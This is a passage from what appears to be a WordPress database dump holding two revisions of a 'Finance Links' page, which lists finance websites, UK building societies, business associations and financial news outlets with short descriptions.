href=\"http://endowment-policy.co.uk/\" target=\"blank"\">Leading LLD Endowment policy</a></li>\r\n <li><a href=\"http://simply-accounting.co.uk/\" target=\"blank"\">TEC Simply accounting</a></li>\r\n <li><a href=\"http://fisa.co.uk/\" target=\"blank"\">FISA </a></li>\r\n <li><a href=\"http://slconsultancy.co.uk/\" target=\"blank"\">SLC (UK) Consultancy </a></li>\r\n <li><a href=\"http://wokingham-cab.org.uk/\" target=\"blank"\">Wokingham cab</a></li>\r\n <li><a href=\"http://delanceyandco.co.uk/\" target=\"blank"\">Delancey & co</a></li>\r\n</ul>\r\n<strong>List of All UK Building Societies</strong>\r\n\r\nBath Investment & Building Society\r\nBeverley Building Society\r\nBuckinghamshire Building Society\r\n\r\nCambridge Building Society\r\nChorley and District Building Society, The\r\nCoventry Building Society\r\nCumberland Building Society\r\n\r\nDarlington Building Society\r\nDudley Building Society\r\nDunfermline Building Society (In Administration)\r\n\r\nEarl Shilton Building Society\r\nEcology Building Society\r\n\r\nFurness Building Society\r\n\r\nHanley Economic Building Society\r\nHarpenden Building Society\r\nHinckley and Rugby Building Society\r\nHolmesdale Building Society\r\n\r\nIpswich Building Society\r\n\r\nLeeds Building Society\r\nLeek United Building Society\r\nLoughborough Building Society\r\nManchester Building Society\r\nMansfield Building Society, The\r\nMarket Harborough Building Society\r\nMarsden Building Society\r\nMelton Mowbray Building Society\r\nMonmouthshire Building Society\r\n\r\nNational Counties Building Society\r\nNationwide Building Society\r\nNewbury Building Society\r\nNewcastle Building Society\r\nNottingham Building Society\r\n\r\nPenrith Building Society\r\nPrincipality Building Society\r\nProgressive Building Society\r\n\r\nSaffron Building Society\r\nScottish Building Society\r\nSkipton Building Society\r\nStafford Railway Building Society, The\r\nSwansea Building Society\r\n\r\nTeachers\' Building Society\r\nTipton and Coseley Building Society\r\n\r\nVernon Building Society\r\n\r\nWest Bromwich Building Society\r\n\r\nYorkshire Building Society\r\n\r\nOther Financial links of interest\r\n\r\n \r\n\r\n<a href=\"http://www.accountingweb.com/\" target=\"_blank\" rel=\"noopener\">Accounting Web</a>: A site that provides accounting news, information, tips, tools and resources for financial professionals.\r\n\r\n<a href=\"http://www.annualreports.com/\" target=\"_blank\" rel=\"noopener\">Annual Reports</a>: This site allows users to view financial reports from companies.\r\n\r\n<a href=\"http://www.banktech.com/\" target=\"_blank\" rel=\"noopener\">Bank Systems and Technology</a>: A website for the banking informational technology community.\r\n\r\n<a href=\"http://www.bankersalmanac.com/addcon/home/resources.aspx\" target=\"_blank\" rel=\"noopener\">Bankers Almanac</a>: This site provides links to websites of international banks and other financial institutions.\r\n\r\n<a href=\"http://www.bankersonline.com/\" target=\"_blank\" rel=\"noopener\">Bankers Online</a>: A site for bankers and financial experts providing information on marketing, technology and e-banking.\r\n\r\n<a href=\"http://www.bizjournals.com/bizwomen\" target=\"_blank\" rel=\"noopener\">BizWomen</a>: A site for women business professionals.\r\n\r\n<a href=\"http://www.charteredbanker.com/\" target=\"_blank\" rel=\"noopener\">Chartered Banker Institute</a>: Find useful information and insights and resources into finance and banking.\r\n\r\n<a href=\"http://www.dailyfinance.com/\" target=\"_blank\" rel=\"noopener\">Daily Finance</a>: A site offering articles and information from leading business and financial experts.\r\n\r\n<a href=\"http://www.dividendinvestor.com/\" target=\"_blank\" rel=\"noopener\">Dividend Investor</a>: A site specializing in stock data analysis and provisions.\r\n\r\n<a href=\"http://equityfeed.com/\" target=\"_blank\" rel=\"noopener\">Equity Feed</a>: A site specifically targeting active traders and day traders.\r\n\r\n<a href=\"http://www.frbsf.org/\" target=\"_blank\" rel=\"noopener\">Federal Reserve Bank of San Francisco</a>: The site for the Federal Reserve Bank of San Francisco.\r\n\r\n \r\n\r\n<a href=\"http://www.franchising.com/\" target=\"_blank\" rel=\"noopener\">Franchise Update Media</a>: A site connecting franchise industry decision makers with information and resources.\r\n\r\n<a href=\"http://www.ibankingfaq.com/\" target=\"_blank\" rel=\"noopener\">IBanking FAQ</a>: A website with investment banking resources and information.\r\n\r\n<a href=\"http://independentbanker.org/\" target=\"_blank\" rel=\"noopener\">Independent Banker</a>: A site for community banking news, trends and insights.\r\n\r\n<a href=\"http://www.informationweek.com/\" target=\"_blank\" rel=\"noopener\">Information Week</a>: A site for the business technology professionals.\r\n\r\n<a href=\"http://ino.com/\" target=\"_blank\" rel=\"noopener\">INO.com</a>: A site specializing in the futures and options markets, with continuous quotes, charts and news.\r\n\r\n<a href=\"http://www.ici.org/\" target=\"_blank\" rel=\"noopener\">Investment Company Institute</a>: The website for the company working to advance the interests of mutual funds, their shareholders, directors and investment advisers.\r\n\r\n<a href=\"http://www.investopedia.com/\" target=\"_blank\" rel=\"noopener\">
Investopedia</a>: A site for beginners in the banking and financial industry that includes a stock simulator.\r\n\r\n<a href=\"http://www.investors.com/default.htm\" target=\"_blank\" rel=\"noopener\">Investor’s Business Daily</a>: A site for stock investment research and education, in addition to business and financial news.\r\n\r\n<a href=\"https://www.jpmorgan.com/pages/jpmorgan\" target=\"_blank\" rel=\"noopener\">JP Morgan</a>: The site for the JP Morgan financial company.\r\n\r\n<a href=\"http://www.kauffman.org/what-we-do/research\" target=\"_blank\" rel=\"noopener\">The Kauffman Foundation</a>: A research site helping businesses understand what drives innovation and economic growth.\r\n\r\n<a href=\"http://www.londonstockexchange.com/home/homepage.htm\" target=\"_blank\" rel=\"noopener\">London Stock Exchange</a>: The official website with stock prices and international markets for the London Stock Exchange.\r\n\r\n<a href=\"http://www.fool.com/?source=iflsittph0000001\" target=\"_blank\" rel=\"noopener\">The Motley Fool</a>: A site with current stock prices and investing advice.\r\n\r\n<a href=\"http://www.nasdaq.com/\" target=\"_blank\" rel=\"noopener\">Nasdaq</a>: The site for Nasdaq, which gives continuous updates throughout the day.\r\n\r\n<a href=\"https://www.nyse.com/index\" target=\"_blank\" rel=\"noopener\">New York Stock Exchange</a>: The site for the NYSE with information for investors and other financial professionals.\r\n\r\n<a href=\"https://www.probanx.com/\" target=\"_blank\" rel=\"noopener\">Probanx</a>: A site for eBanking software.\r\n\r\n<a href=\"http://www.sec.gov/\" target=\"_blank\" rel=\"noopener\">Securities and Exchange Commission</a>: As part of the Federal Government, the SEC protects investors and maintains market integrity among many other jobs in the finance industry.\r\n\r\n<a class=\"broken_link\" href=\"http://www.seisfund.com/home.html\" target=\"_blank\" rel=\"noopener\">SEIS Fund</a>: A start-up funding website for businesses.\r\n\r\n<a href=\"https://www.scottrade.com/online-trading/trading-website.html\" target=\"_blank\" rel=\"noopener\">Scottrade</a>: The website for the Scottrade financial company.\r\n\r\n<a href=\"http://www.shibuimarkets.com/\" target=\"_blank\" rel=\"noopener\">Shibui Markets</a>: A global financial portal that helps users understand financial information including foreign currency exchanges, emerging market bonds and international equities.\r\n\r\n<a href=\"http://www.standardandpoors.com/en_US/web/guest/home\" target=\"_blank\" rel=\"noopener\">Standard and Poor’s</a>: The site for the world’s leading contributor of independent credit ratings, risk evaluation and investment research.\r\n\r\n<a href=\"http://www.startupnation.com/\" target=\"_blank\" rel=\"noopener\">Startup Nation</a>: A site to help businesses grow and plan for their future.\r\n\r\n<a href=\"http://www.thestreet.com/\" target=\"_blank\" rel=\"noopener\">The Street</a>: A site giving financial news and information along with the stock market updates.\r\n\r\n<a href=\"http://stockcharts.com/\" target=\"_blank\" rel=\"noopener\">Stock Charts</a>: A site offering tools to create attractive financial charts.\r\n\r\n<a href=\"http://www.stockmarketgame.org/\" target=\"_blank\" rel=\"noopener\">The Stock Market Game</a>: A site with real time stock information and news on the stock markets.\r\n\r\n<a href=\"http://www.stocktrak.com/\" target=\"_blank\" rel=\"noopener\">Stock Trak</a>: A site for stock market game simulations.\r\n\r\n<a href=\"https://www.tdameritrade.com/home.page\" target=\"_blank\" rel=\"noopener\">TD Ameritrade</a>: The website for the financial trading company.\r\n\r\n<a href=\"http://www.ted.com/\" target=\"_blank\" rel=\"noopener\">TED</a>: A multitude of videos from the country’s most sought after business innovators and financial experts.\r\n\r\n<a href=\"http://www.updown.com/\" target=\"_blank\" rel=\"noopener\">UpDown</a>: A real-time trading simulation to help investors of all levels to improve their skills.\r\n\r\n<a href=\"https://personal.vanguard.com/us/funds/snapshot?FundId=0970&FundIntExt=INT\" target=\"_blank\" rel=\"noopener\">Vanguard</a>: The website for the financial planning company.\r\n<h3>Business Associations and Organizations</h3>\r\n<a href=\"http://www.aba.com/Pages/default.aspx\" target=\"_blank\" rel=\"noopener\">American Bankers Association</a>: Financial and regulatory information for bankers and financial professionals and consumers.\r\n\r\n<a href=\"http://www.afajof.org/view/index.html\" target=\"_blank\" rel=\"noopener\">American Financial Association</a>: An organization devoted to the study and promotion and knowledge of financial economics.\r\n\r\n<a href=\"http://www.imanet.org/ima_home.aspx\" target=\"_blank\" rel=\"noopener\">Association of Accountants and Financial Professionals in Business</a>: An organization to promote knowledge and professionalism among cost accountants and financial executives.\r\n\r\n<a href=\"http://www.afponline.org/\" target=\"_blank\" rel=\"noopener\">Association for Financial Professionals</a>: A professional society that represents finance executives globally.\r\n\r\n<a href=\"http://www.bis.org/about/index.htm\" target=\"_blank\" rel=\"noopener\">Bank for International Settlements</a>: The world’s oldest international financial organization.\r\n\r\n<a href=\"https://www.cfa.com/eweb/\" target=\"_blank\" rel=\"noopener\">Commercial Finance Associations</a>: The international trade association dedicated to the asset-based lending and factoring industries.\r\n\r\n<a href=\"http://www.efa-online.org/r/default.asp?iId=ILGLJ\" target=\"_blank\" rel=\"noopener\">European Finance Association</a>: A professional society of academics and practitioners with an interest in financial management, theory and application.\r\n\r\n<a href=\"http://www.financialexecutives.org/KenticoCMS/home.aspx#axzz3HgZcmiN7\" target=\"_blank\" rel=\"noopener\">Financial Executives International</a>: A site senior-level financial executives.\r\n\r\n<a href=\"http://fwa.org/\" target=\"_blank\" rel=\"noopener\">Financial Women’s Association</a>: An association for high-achieving financial professionals.\r\n\r\n \r\n\r\n<a href=\"http://www.financialpro.org/\" target=\"_blank\" rel=\"noopener\">Society of Financial Service Professionals</a>: Society of financial professionals helping consumers with financial planning.\r\n<h3>News Agencies and Financial News</h3>\r\n<a href=\"http://www.americanbanker.com/\" target=\"_blank\" rel=\"noopener\">American Banker</a>: A website devoted to news from the US banking and finance industries.\r\n\r\n<a href=\"http://www.bloomberg.com/\" target=\"_blank\" rel=\"noopener\">Bloomberg News</a>: 24-hour news coverage on economies, markets, commerce, industries and governments.\r\n\r\n<a href=\"http://www.cnbc.com/\" target=\"_blank\" rel=\"noopener\">CNBC</a>: The business centered portion of NBC with 24-hour business news.\r\n\r\n<a href=\"http://www.cnn.com/\" target=\"_blank\" rel=\"noopener\">CNN</a>: The 24-hour news channel’s website that is constantly updated with breaking stories from around the world, including both financial, political and economic news.\r\n\r\n<a href=\"http://money.cnn.com/\" target=\"_blank\" rel=\"noopener\">CNN Money</a>: This site is devoted to financial and economic news from around the world.\r\n\r\n<a href=\"http://dealbreaker.com/\" target=\"_blank\" rel=\"noopener\">Dealbreaker</a>: A website with financial news, commentary and analysis about Wall Street.\r\n\r\n<a href=\"http://www.efinancialnews.com/\" target=\"_blank\" rel=\"noopener\">eFinancial News</a>: A securities and investment banking weekly news source.\r\n\r\n<a href=\"http://www.ft.com/home/us\" target=\"_blank\" rel=\"noopener\">Financial Times</a>: This site, based in the UK, provides international business, finance, economic and political news and commentary.\r\n\r\n<a href=\"http://www.foxbusiness.com/index.html\" target=\"_blank\" rel=\"noopener\">Fox Business News</a>: Website for the 24-news channel, focused on business news.\r\n\r\n<a href=\"https://www.google.com/finance\" target=\"_blank\" rel=\"noopener\">Google Finance</a>: This site provides real-time stock quotes and charts, financial news, currency conversion and portfolio tracking.\r\n\r\n<a href=\"http://www.ibtimes.com/\" target=\"_blank\" rel=\"noopener\">International Business Times</a>: This site provides international business news, financial news, market news and political commentary that many CEOs need to keep up to date on the ever-changing world around them.\r\n\r\n<a href=\"http://www.marketplace.org/\" target=\"_blank\" rel=\"noopener\">Marketplace</a>: A site from American Public Media centered on the economy, personal finance, Wall Street and World News.\r\n\r\n<a href=\"http://www.marketwatch.com/\" target=\"_blank\" rel=\"noopener\">Market Watch</a>: The financial website is a subsidiary of the Wall Street Journal. This site has up-to-date financial information and stock market numbers.\r\n\r\n<a href=\"http://www.msn.com/en-us/money\" target=\"_blank\" rel=\"noopener\">MSN Money</a>: The financial website of NBC News. This site provides information on personal finance and the stock markets.\r\n\r\n<a href=\"http://www.npr.org/\" target=\"_blank\" rel=\"noopener\">NPR</a>: Local, domestic and international news presented in various news programs and blogs.\r\n\r\n<a href=\"http://dealbook.nytimes.com/\" target=\"_blank\" rel=\"noopener\">NYT Dealbook</a>: A blog with business news and opinion columns on Wall Street.\r\n\r\n<a href=\"http://qz.com/\" target=\"_blank\" rel=\"noopener\">Quartz</a>: A relatively new news agency, focused on the global economy. News is designed to be read on tablets and smart phones.\r\n\r\n<a href=\"http://www.reuters.com/finance\" target=\"_blank\" rel=\"noopener\">Reuters Finance</a>: The top news organization’s site for financial news.\r\n\r\n<a class=\"broken_link\" href=\"http://seekingalpha.com/\" target=\"_blank\" rel=\"noopener\">Seeking Alpha</a>: This site provides breaking news and articles on stocks in real-time.\r\n\r\n<a href=\"http://finance.yahoo.com/\" target=\"_blank\" rel=\"noopener\">Yahoo Finance</a>: This site has up to date financial news, in addition to portfolio managements resources, international market date, message boards and more.\r\n\r\n ','Finance Links','','inherit','closed','closed','','125-revision-v1','','','2017-10-14 07:52:55','2017-10-14 07:52:55','',125,'http://santandershareholder.co.uk/125-revision-v1',0,'revision','',0),(131,1,'2017-10-14 07:54:15','2017-10-14 07:54:15','<h2>Financial Institutions, publications and websites of note</h2>\r\n \r\n<ul>\r\n <li><a href=\"http://fortune.com/\" target=\"_blank\" rel=\"noopener\">Fortune Magazine</a>: A magazine focused on Fortune 500 companies and breaking business news.</li>\r\n <li><a href=\"http://hbr.org/\" target=\"_blank\" rel=\"noopener\">Harvard Business Review</a></li>\r\n <li><a href=\"http://www.huffingtonpost.com/\" target=\"_blank\" rel=\"noopener\">Huffington Post</a> UK and US finance news</li>\r\n <li><a href=\"http://www.gfma.org/\" target=\"_blank\" rel=\"noopener\">Global Financial Markets Association</a>: An association representing the world’s leading financial and capital market participants.</li>\r\n <li><a href=\"http://www.icba.org/\" target=\"_blank\" rel=\"noopener\">The Independent Community Bankers of America</a>: A resource site for independent bankers.</li>\r\n <li><a href=\"http://www.naifa.org/\" target=\"_blank\" rel=\"noopener\">National Association of Insurance and Financial Advisors</a>: An association representing the interests of insurance and financial advisors in the US</li>\r\n <li><a href=\"http://www.sifma.org/about/\" target=\"_blank\" rel=\"noopener\">Securities Industry and Financial Markets Association</a>: An association that brings together the shared interests security firms, banks and asset managers.</li>\r\n <li><a href=\"http://www.kiplinger.com/\" target=\"_blank\" rel=\"noopener\">Kiplinger</a>: US magazine offering personal financial news, investing admire and business forecasts.</li>\r\n <li><a href=\"http://www.nytimes.com/pages/business/\" target=\"_blank\" rel=\"noopener\">The New York Times</a>: Breaking headlines + financial news from Wall Street.</li>\r\n <li><a href=\"http://time.com/\" target=\"_blank\" rel=\"noopener\">Time</a>: More in-depth political, economic and news worthy stories.</li>\r\n <li><a href=\"http://online.wsj.com/home-page\" target=\"_blank\" rel=\"noopener\">Wall Street Journal</a>: Newspaper focusing on domestic and international news with a business-focus.</li>\r\n <li><a href=\"https://www.hunterfinance.co.uk/apply-for-loan\" target=\"blank"\">Hunter Finance</a> UK finance house offering property loans</li>\r\n <li><a href=\"https://www.fca.org.uk/\" target=\"_blank\" rel=\"noopener\">FCA | </a>Financial Conduct Authority</li>\r\n <li><a href=\"http://www.bankofengland.co.uk/Pages/home.aspx\" target=\"_blank\" rel=\"noopener\">Bank of England</a></li>\r\n</ul>\r\n \r\n\r\n<strong>Other Finance websites</strong>\r\n<ul>\r\n <li><a href=\"http://waterfall-leasing.co.uk/\" target=\"blank"\">Waterfall leasing</a></li>\r\n <li><a href=\"http://mytermlifeinsurance.co.uk/\" target=\"blank"\">My term lifeinsurance</a></li>\r\n <li><a href=\"http://kings-college-brokers.co.uk/\" target=\"blank"\">Kings college brokers</a></li>\r\n <li><a href=\"http://firstchoiceloan.co.uk/\" target=\"blank"\">First choice UK loans</a></li>\r\n <li><a href=\"http://legal-medical.co.uk/\" target=\"blank"\">legal medical</a></li>\r\n <li><a href=\"http://rapc.co.uk/\" target=\"blank"\">rapc</a></li>\r\n <li><a href=\"http://humdrumming.co.uk/\" target=\"blank"\">Hum drumming</a></li>\r\n <li><a href=\"http://endowment-policy.co.uk/\" target=\"blank"\">Leading LLD Endowment policy</a></li>\r\n <li><a href=\"http://simply-accounting.co.uk/\" target=\"blank"\">TEC Simply accounting</a></li>\r\n <li><a href=\"http://fisa.co.uk/\" target=\"blank"\">FISA </a></li>\r\n <li><a href=\"http://slconsultancy.co.uk/\" target=\"blank"\">SLC (UK) Consultancy </a></li>\r\n <li><a href=\"http://wokingham-cab.org.uk/\" target=\"blank"\">Wokingham cab</a></li>\r\n <li><a href=\"http://delanceyandco.co.uk/\" target=\"blank"\">Delancey & co</a></li>\r\n</ul>\r\n<strong>List of All UK Building Societies</strong>\r\n\r\nBath Investment & Building Society\r\nBeverley Building Society\r\nBuckinghamshire Building Society\r\n\r\nCambridge Building Society\r\nChorley and District Building Society, The\r\nCoventry Building Society\r\nCumberland Building Society\r\n\r\nDarlington Building Society\r\nDudley Building Society\r\nDunfermline Building Society (In Administration)\r\n\r\nEarl Shilton Building Society\r\nEcology Building Society\r\n\r\nFurness Building Society\r\n\r\nHanley Economic Building Society\r\nHarpenden Building Society\r\nHinckley and Rugby Building Society\r\nHolmesdale Building Society\r\n\r\nIpswich Building Society\r\n\r\nLeeds Building Society\r\nLeek United Building Society\r\nLoughborough Building Society\r\nManchester Building Society\r\nMansfield Building Society, The\r\nMarket Harborough Building Society\r\nMarsden Building Society\r\nMelton Mowbray Building Society\r\nMonmouthshire Building Society\r\n\r\nNational Counties Building Society\r\nNationwide Building Society\r\nNewbury Building Society\r\nNewcastle Building Society\r\nNottingham Building Society\r\n\r\nPenrith Building Society\r\nPrincipality Building Society\r\nProgressive Building Society\r\n\r\nSaffron Building Society\r\nScottish Building Society\r\nSkipton Building Society\r\nStafford Railway Building Society, The\r\nSwansea Building Society\r\n\r\nTeachers\' Building Society\r\nTipton and Coseley Building Society\r\n\r\nVernon Building Society\r\n\r\nWest Bromwich Building Society\r\n\r\nYorkshire Building Society\r\n\r\nOther Financial links of interest\r\n\r\n \r\n\r\n<a href=\"http://www.accountingweb.com/\" target=\"_blank\" rel=\"noopener\">Accounting Web</a>: A site that provides accounting news, information, tips, tools and resources for financial professionals.\r\n\r\n<a href=\"http://www.annualreports.com/\" target=\"_blank\" rel=\"noopener\">Annual Reports</a>: This site allows users to view financial reports from companies.\r\n\r\n<a href=\"http://www.banktech.com/\" target=\"_blank\" rel=\"noopener\">Bank Systems and Technology</a>: A website for the banking informational technology community.\r\n\r\n<a href=\"http://www.bankersalmanac.com/addcon/home/resources.aspx\" target=\"_blank\" rel=\"noopener\">Bankers Almanac</a>: This site provides links to websites of international banks and other financial institutions.\r\n\r\n<a href=\"http://www.bankersonline.com/\" target=\"_blank\" rel=\"noopener\">Bankers Online</a>: A site for bankers and financial experts providing information on marketing, technology and e-banking.\r\n\r\n<a href=\"http://www.bizjournals.com/bizwomen\" target=\"_blank\" rel=\"noopener\">BizWomen</a>: A site for women business professionals.\r\n\r\n<a href=\"http://www.charteredbanker.com/\" target=\"_blank\" rel=\"noopener\">Chartered Banker Institute</a>: Find useful information and insights and resources into finance and banking.\r\n\r\n<a href=\"http://www.dailyfinance.com/\" target=\"_blank\" rel=\"noopener\">Daily Finance</a>: A site offering articles and information from leading business and financial experts.\r\n\r\n<a href=\"http://www.dividendinvestor.com/\" target=\"_blank\" rel=\"noopener\">Dividend Investor</a>: A site specializing in stock data analysis and provisions.\r\n\r\n<a href=\"http://equityfeed.com/\" target=\"_blank\" rel=\"noopener\">Equity Feed</a>: A site specifically targeting active traders and day traders.\r\n\r\n<a href=\"http://www.frbsf.org/\" target=\"_blank\" rel=\"noopener\">Federal Reserve Bank of San Francisco</a>: The site for the Federal Reserve Bank of San Francisco.\r\n\r\n \r\n\r\n<a href=\"http://www.franchising.com/\" target=\"_blank\" rel=\"noopener\">Franchise Update Media</a>: A site connecting franchise industry decision makers with information and resources.\r\n\r\n<a href=\"http://www.ibankingfaq.com/\" target=\"_blank\" rel=\"noopener\">IBanking FAQ</a>: A website with investment banking resources and information.\r\n\r\n<a href=\"http://independentbanker.org/\" target=\"_blank\" rel=\"noopener\">Independent Banker</a>: A site for community banking news, trends and insights.\r\n\r\n<a href=\"http://www.informationweek.com/\" target=\"_blank\" rel=\"noopener\">Information Week</a>: A site for the business technology professionals.\r\n\r\n<a href=\"http://ino.com/\" target=\"_blank\" rel=\"noopener\">INO.com</a>: A site specializing in the futures and options markets, with continuous quotes, charts and news.\r\n\r\n<a href=\"http://www.ici.org/\" target=\"_blank\" rel=\"noopener\">Investment Company Institute</a>: The website for the company working to advance the interests of mutual funds, their shareholders, directors and investment advisers.\r\n\r\n<a href=\"http://www.investopedia.com/\" target=\"_blank\" rel=\"noopener\">
Investopedia</a>: A site for beginners in the banking and financial industry that includes a stock simulator.\r\n\r\n<a href=\"http://www.investors.com/default.htm\" target=\"_blank\" rel=\"noopener\">Investor’s Business Daily</a>: A site for stock investment research and education, in addition to business and financial news.\r\n\r\n<a href=\"https://www.jpmorgan.com/pages/jpmorgan\" target=\"_blank\" rel=\"noopener\">JP Morgan</a>: The site for the JP Morgan financial company.\r\n\r\n<a href=\"http://www.kauffman.org/what-we-do/research\" target=\"_blank\" rel=\"noopener\">The Kauffman Foundation</a>: A research site helping businesses understand what drives innovation and economic growth.\r\n\r\n<a href=\"http://www.londonstockexchange.com/home/homepage.htm\" target=\"_blank\" rel=\"noopener\">London Stock Exchange</a>: The official website with stock prices and international markets for the London Stock Exchange.\r\n\r\n<a href=\"http://www.fool.com/?source=iflsittph0000001\" target=\"_blank\" rel=\"noopener\">The Motley Fool</a>: A site with current stock prices and investing advice.\r\n\r\n<a href=\"http://www.nasdaq.com/\" target=\"_blank\" rel=\"noopener\">Nasdaq</a>: The site for Nasdaq, which gives continuous updates throughout the day.\r\n\r\n<a href=\"https://www.nyse.com/index\" target=\"_blank\" rel=\"noopener\">New York Stock Exchange</a>: The site for the NYSE with information for investors and other financial professionals.\r\n\r\n<a href=\"https://www.probanx.com/\" target=\"_blank\" rel=\"noopener\">Probanx</a>: A site for eBanking software.\r\n\r\n<a href=\"http://www.sec.gov/\" target=\"_blank\" rel=\"noopener\">Securities and Exchange Commission</a>: As part of the Federal Government, the SEC protects investors and maintains market integrity among many other jobs in the finance industry.\r\n\r\n<a class=\"broken_link\" href=\"http://www.seisfund.com/home.html\" target=\"_blank\" rel=\"noopener\">SEIS Fund</a>: A start-up funding website for businesses.\r\n\r\n<a href=\"https://www.scottrade.com/online-trading/trading-website.html\" target=\"_blank\" rel=\"noopener\">Scottrade</a>: The website for the Scottrade financial company.\r\n\r\n<a href=\"http://www.shibuimarkets.com/\" target=\"_blank\" rel=\"noopener\">Shibui Markets</a>: A global financial portal that helps users understand financial information including foreign currency exchanges, emerging market bonds and international equities.\r\n\r\n<a href=\"http://www.standardandpoors.com/en_US/web/guest/home\" target=\"_blank\" rel=\"noopener\">Standard and Poor’s</a>: The site for the world’s leading contributor of independent credit ratings, risk evaluation and investment research.\r\n\r\n<a href=\"http://www.startupnation.com/\" target=\"_blank\" rel=\"noopener\">Startup Nation</a>: A site to help businesses grow and plan for their future.\r\n\r\n<a href=\"http://www.thestreet.com/\" target=\"_blank\" rel=\"noopener\">The Street</a>: A site giving financial news and information along with the stock market updates.\r\n\r\n<a href=\"http://stockcharts.com/\" target=\"_blank\" rel=\"noopener\">Stock Charts</a>: A site offering tools to create attractive financial charts.\r\n\r\n<a href=\"http://www.stockmarketgame.org/\" target=\"_blank\" rel=\"noopener\">The Stock Market Game</a>: A site with real time stock information and news on the stock markets.\r\n\r\n<a href=\"http://www.stocktrak.com/\" target=\"_blank\" rel=\"noopener\">Stock Trak</a>: A site for stock market game simulations.\r\n\r\n<a href=\"https://www.tdameritrade.com/home.page\" target=\"_blank\" rel=\"noopener\">TD Ameritrade</a>: The website for the financial trading company.\r\n\r\n<a href=\"http://www.ted.com/\" target=\"_blank\" rel=\"noopener\">TED</a>: A multitude of videos from the country’s most sought after business innovators and financial experts.\r\n\r\n<a href=\"http://www.updown.com/\" target=\"_blank\" rel=\"noopener\">UpDown</a>: A real-time trading simulation to help investors of all levels to improve their skills.\r\n\r\n<a href=\"https://personal.vanguard.com/us/funds/snapshot?FundId=0970&FundIntExt=INT\" target=\"_blank\" rel=\"noopener\">Vanguard</a>: The website for the financial planning company.\r\n<h3>Business Associations and Organizations</h3>\r\n<a href=\"http://www.aba.com/Pages/default.aspx\" target=\"_blank\" rel=\"noopener\">American Bankers Association</a>: Financial and regulatory information for bankers and financial professionals and consumers.\r\n\r\n<a href=\"http://www.afajof.org/view/index.html\" target=\"_blank\" rel=\"noopener\">American Financial Association</a>: An organization devoted to the study and promotion and knowledge of financial economics.\r\n\r\n<a href=\"http://www.imanet.org/ima_home.aspx\" target=\"_blank\" rel=\"noopener\">Association of Accountants and Financial Professionals in Business</a>: An organization to promote knowledge and professionalism among cost accountants and financial executives.\r\n\r\n<a href=\"http://www.afponline.org/\" target=\"_blank\" rel=\"noopener\">Association for Financial Professionals</a>: A professional society that represents finance executives globally.\r\n\r\n<a href=\"http://www.bis.org/about/index.htm\" target=\"_blank\" rel=\"noopener\">Bank for International Settlements</a>: The world’s oldest international financial organization.\r\n\r\n<a href=\"https://www.cfa.com/eweb/\" target=\"_blank\" rel=\"noopener\">Commercial Finance Associations</a>: The international trade association dedicated to the asset-based lending and factoring industries.\r\n\r\n<a href=\"http://www.efa-online.org/r/default.asp?iId=ILGLJ\" target=\"_blank\" rel=\"noopener\">European Finance Association</a>: A professional society of academics and practitioners with an interest in financial management, theory and application.\r\n\r\n<a href=\"http://www.financialexecutives.org/KenticoCMS/home.aspx#axzz3HgZcmiN7\" target=\"_blank\" rel=\"noopener\">Financial Executives International</a>: A site senior-level financial executives.\r\n\r\n<a href=\"http://fwa.org/\" target=\"_blank\" rel=\"noopener\">Financial Women’s Association</a>: An association for high-achieving financial professionals.\r\n\r\n \r\n\r\n<a href=\"http://www.financialpro.org/\" target=\"_blank\" rel=\"noopener\">Society of Financial Service Professionals</a>: Society of financial professionals helping consumers with financial planning.\r\n<h3>News Agencies and Financial News</h3>\r\n<a href=\"http://www.americanbanker.com/\" target=\"_blank\" rel=\"noopener\">American Banker</a>: A website devoted to news from the US banking and finance industries.\r\n\r\n<a href=\"http://www.bloomberg.com/\" target=\"_blank\" rel=\"noopener\">Bloomberg News</a>: 24-hour news coverage on economies, markets, commerce, industries and governments.\r\n\r\n<a href=\"http://www.cnbc.com/\" target=\"_blank\" rel=\"noopener\">CNBC</a>: The business centered portion of NBC with 24-hour business news.\r\n\r\n<a href=\"http://www.cnn.com/\" target=\"_blank\" rel=\"noopener\">CNN</a>: The 24-hour news channel’s website that is constantly updated with breaking stories from around the world, including both financial, political and economic news.\r\n\r\n<a href=\"http://money.cnn.com/\" target=\"_blank\" rel=\"noopener\">CNN Money</a>: This site is devoted to financial and economic news from around the world.\r\n\r\n<a href=\"http://dealbreaker.com/\" target=\"_blank\" rel=\"noopener\">Dealbreaker</a>: A website with financial news, commentary and analysis about Wall Street.\r\n\r\n<a href=\"http://www.efinancialnews.com/\" target=\"_blank\" rel=\"noopener\">eFinancial News</a>: A securities and investment banking weekly news source.\r\n\r\n<a href=\"http://www.ft.com/home/us\" target=\"_blank\" rel=\"noopener\">Financial Times</a>: This site, based in the UK, provides international business, finance, economic and political news and commentary.\r\n\r\n<a href=\"http://www.foxbusiness.com/index.html\" target=\"_blank\" rel=\"noopener\">Fox Business News</a>: Website for the 24-news channel, focused on business news.\r\n\r\n<a href=\"https://www.google.com/finance\" target=\"_blank\" rel=\"noopener\">Google Finance</a>: This site provides real-time stock quotes and charts, financial news, currency conversion and portfolio tracking.\r\n\r\n<a href=\"http://www.ibtimes.com/\" target=\"_blank\" rel=\"noopener\">International Business Times</a>: This site provides international business news, financial news, market news and political commentary that many CEOs need to keep up to date on the ever-changing world around them.\r\n\r\n<a href=\"http://www.marketplace.org/\" target=\"_blank\" rel=\"noopener\">Marketplace</a>: A site from American Public Media centered on the economy, personal finance, Wall Street and World News.\r\n\r\n<a href=\"http://www.marketwatch.com/\" target=\"_blank\" rel=\"noopener\">Market Watch</a>: The financial website is a subsidiary of the Wall Street Journal. This site has up-to-date financial information and stock market numbers.\r\n\r\n<a href=\"http://www.msn.com/en-us/money\" target=\"_blank\" rel=\"noopener\">MSN Money</a>: The financial website of NBC News. This site provides information on personal finance and the stock markets.\r\n\r\n<a href=\"http://www.npr.org/\" target=\"_blank\" rel=\"noopener\">NPR</a>: Local, domestic and international news presented in various news programs and blogs.\r\n\r\n<a href=\"http://dealbook.nytimes.com/\" target=\"_blank\" rel=\"noopener\">NYT Dealbook</a>: A blog with business news and opinion columns on Wall Street.\r\n\r\n<a href=\"http://qz.com/\" target=\"_blank\" rel=\"noopener\">Quartz</a>: A relatively new news agency, focused on the global economy. News is designed to be read on tablets and smart phones.\r\n\r\n<a href=\"http://www.reuters.com/finance\" target=\"_blank\" rel=\"noopener\">Reuters Finance</a>: The top news organization’s site for financial news.\r\n\r\n<a class=\"broken_link\" href=\"http://seekingalpha.com/\" target=\"_blank\" rel=\"noopener\">Seeking Alpha</a>: This site provides breaking news and articles on stocks in real-time.\r\n\r\n<a href=\"http://finance.yahoo.com/\" 